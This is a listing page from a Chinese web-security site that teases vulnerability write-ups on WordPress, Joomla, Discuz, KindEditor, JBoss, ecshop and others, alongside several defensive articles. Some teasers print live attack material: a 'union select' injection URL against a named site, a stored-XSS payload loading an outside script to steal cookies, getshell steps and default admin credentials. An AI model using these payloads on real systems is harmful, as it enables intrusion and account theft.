wordpress暴路径 影响所有版本 - 网站安全 - 自学关注热度:16

缺陷文件:http://www.2cto.com /{Path}/wp-includes/registration-functions.php 关键代码:-www.2cto.com?php/*** Deprecated. No longer needed.** @package WordPress*/_deprecated_file( basena.....[详情]

Joomla远程上传漏洞 可直接getshell - 网站安全 - 自关注热度:28

作者：13371. 有些joomal需要先注册.http://site/index.php?option=com_userview=login2. 到上传地址http://www.2cto.com /index.php?option=com_ksadvertiserItemid=36task=addcatid=0lang=en3. 点击i.....[详情]

315爱购程序任意文件源码查看 - 网站安全 - 自学关注热度:18

pic.phpfunction url_base64_decode($code){ if($code==) return ; $code=str_replace(!,#39;+#39;,$code); $code=str_replace(,,#39;/#39;,$code); $str=base64_decode($code); return $s.....[详情]

discuz X25 某功能存在 xss漏洞 html 脚本未过滤 - 网关注热度:33

discuz X25 广播回复存在xss漏洞html、脚本未过滤修复方案：过滤下就ok了作者 造梦师..[详情]

ecshop数据库默认账户信息，导致网站信息泄漏关注热度:20

ecshop在默认安装的时候，安装程序会添加两个管理员账户，虽然管理员账户没有操作权限，但是通过这两个账户还是可以看到网站的订单数据.这是admin_user表的截图。随便找个ecshop的网站..[详情]

对 zend framework xxe injection 的分析 - 网站安全 - 自关注热度:28

前几天网上爆出一个zend framework 漏洞 作者：mkods具体描述如下: https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt ; 根据描述，该漏洞是发生在zend 框架 xmlrpc模块的.....[详情]

iis6 提权提示 Can not find wmiprvse.exe 的突破方法 -关注热度:30

方法一：在IIS环境下，如果权限做得不严格，我们在aspx大马里面是有权限直接结束wmiprvse.exe进程的。进程查看里面直接K掉在结束之后，它会再次运行，这时候的PID值的不一样的。这时候..[详情]

利用JBoss漏洞拿webshell方法 - 网站安全 - 自学ph关注热度:32

JBoss是一个大型应用平台，普通用户很难接触到。越是难以接触到的东西越觉得高深，借用北京公交司机李素丽的一句话用力只能干出称职，用心才能干出优秀，在安全上也是如此，虽然..[详情]

Umbraco CMS远程命令执行缺陷 - 网站安全 - 自学ph关注热度:29

require #39;msf/core#39;class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize super( .....[详情]

KindEditor编辑器上传修改拿shell漏洞 - 网站安全关注热度:156

作者：relywind影响版本：KindEditor 3.5.2~4.1漏洞利用：打开编辑器，将一句话改名为1.jpg 上传图片，打开文件管理，进入down目录，跳至尾页，最后一个图片既是我们上传的一句话点击改名打..[详情]

创建安全PHP应用程序的实用建议 - 网站安全 - 自关注热度:20

大家都知道PHP已经是当前最流行的Web应用编程语言了。但是也与其他脚本语言一样，PHP也有几个很危险的安全漏洞。所以在这篇教学文章中，我们将大致看看几个实用的技巧来让你避免..[详情]

XSS代码触发条件，插入XSS代码的常用方法 - 网站关注热度:20

1.脚本插入(1)插入javascript和vbscript正常字符。例1：img src=javascript:alert(/xss/)例2：table background=javascript:alert(/xss/)/tablersquo;/在表格中插入脚本例3：img src=vbscript:msgbox.....[详情]

又一次运维，恶意js脚本注入访问伪随机域名 -关注热度:17

我们的服务器又出入侵事故了。有客户的html 网页底部被插入了一段js 脚本，导致访客打开网页时被杀毒软件警告网站上有恶意代码。在黑链SEO 中这是常见的手法，但奇特的地方就在于..[详情]

HTML5安全：内容安全策略（CSP）简介 - 网站安全关注热度:29

前言：HTML5出现后，网络安全更加受到广泛的关注。Web对于网络安全有哪些改进？我们如何来面对越来越危险的网络欺诈和攻击？下面的文章谈到了W3C对于这个问题的最新解决方案。未..[详情]

Velocity Parse()函数引发的本地包含漏洞及利用方法关注热度:18

一 背景及描述Velocity是一个基于java的模板引擎（template engine），它允许任何人仅仅简单的使用模板语言（template language）来引用由java代码定义的对象。我们知道，越是功能强大、函数丰..[详情]

Xdcms订餐网站管理系统代码审计 - 网站安全 - 自学关注热度:15

大家好，我是缘灭 我又来了 今天下午一直在做单子没空看代码。晚上天气太热又不想回家，呆在办公室无聊，就开始找源码下载来研究学习挖洞。纯属于新手学习代码审计练手，大牛请..[详情]

查找Centos Linux服务器上入侵者的WebShell后门 - 网关注热度:19

服务器被挂马或被黑的朋友应该知道，黑客入侵web服务器的第一目标是往服务器上上传一个webshell，有了webshell黑客就可以干更多的事 情。网站被挂马后很多人会束手无策，无从查起，其..[详情]

过滤XSS（跨站脚本攻击）的函数和防止svn版本库关注热度:79

php过滤xss函数?php/*** @过滤XSS（跨站脚本攻击）的函数* @par $val 字符串参数，可能包含恶意的脚本代码如script language=javascriptalert(hello world);/script* @return 处理后的字符串* .....[详情]

QQ空间个人首页一处比较隐蔽的存储型XSS及修复方关注热度:31

一处比较隐蔽的存储型XSS，个人首页的，通杀IE，Chrome,Firfox, 至于危害和利用，就不多说了。 主要和大家分享下思路。这篇《突破xss字符限制执行任意js》相信很多人都看过，其实里面的..[详情]

HTML5跨域请求特性导致的Fackbook Xss - 网站安全关注热度:24

原文是英文的，将大致Xss流程转过来了。传统情况下缺陷URL是：http://touch.facebook.com/#profile.php打开这个页面后，会执行下面的操作 （这里是基于JQ的伪代码）$.get(#后面的地址,function(返回..[详情]

金山网络个人中心POST SQL注射 - 网站安全 - 自学关注热度:15

http://i.ijinshan.com/register/verifyPOSTDATA：passport=88952634is_mobile=1code=88952634修复方案：那是金山呀。。。作者 z@cx..[详情]

bbsxp上传过滤不严 可上传asp;jpg 文件 - 网站安全关注热度:30

登录账号后 发表新主题 添加附件 可以添加asp;jpg格式文件修复方案：管理在后台禁用附件上传 或者 在禁用上传类型中 添加类似asp;jpg php;jpg 等格式..[详情]

DiscuzX2个人空间图片EXIF信息XSS - 网站安全 - 自学关注热度:16

图片里插入非法的EXIF信息。你懂的xss漏洞产生。。。。。不过有点鸡肋，在特定条件下才能读取到EXIF信息。修复方案：过滤。。作者 safe121..[详情]

CLscript CMS v3.0多重缺陷及修复 - 网站安全 - 自学关注热度:15

标题：CLscript CMS v3.0 - Multiple Web Vulnerabilities缺陷影响版本：8.6程序介绍:=============With the professionally developed Classified-Portal CLscript 3.0 can Visitors post Clas.....[详情]

淇晨科技网站管理系統默认漏洞 - 网站安全 - 自关注热度:17

365web樣版管理後端默认后台：cctmanage/login.php默认账户：cct95 28528980拿shell：系统自带上传文件采用本地验证，绕过就不用我说吧。opera、burp 其他什么的绕过www.2cto.com有些带ckfinder编辑器的..[详情]

中关村在线博客子站SQL注入及修复方案 - 网站安关注热度:19

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5--http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7.....[详情]

时时送订单系统后台登陆框post注入及修复 - 网站关注热度:16

订单系统存在登陆框注入，然后订单root权限，数据库等一些信息，然后进一步渗透修复方案：加强过滤验证作者 also..[详情]

图虫网存储xss 可获取cookies - 网站安全 - 自学ph关注热度:23

危害大吧, cookies只要拿到了 账号+MD5密码就到手了,然后......详细说明：http://tuchong.com/settings/注册了在这里配置: 在标签处插入:ascript/src=//tmxk.org;!--a保存.个人主页触发了 哦\(^o^)/~ht.....[详情]

乐峰网用户认证体系存在逻辑漏洞，可修改任意关注热度:21

乐峰网用户认证体系存在逻辑漏洞，可修改任意用户密码本来单条漏洞不至于到15，但是这里考虑到 利用难度，影响范围，重复利用等影响方面，并且攻击的是用户的认证体系。所以自..[详情]

网店管家3.0，网站帐号密码泄露，可以导致授权关注热度:55

网店管家3.0，是一款集京东、淘宝商城、淘宝集市店为一体的电子商务ERP软件！其中用户不乏有一些所谓的大卖家！但是在授权码保护上却做的一般！当购买网店管家授权码之后，授权..[详情]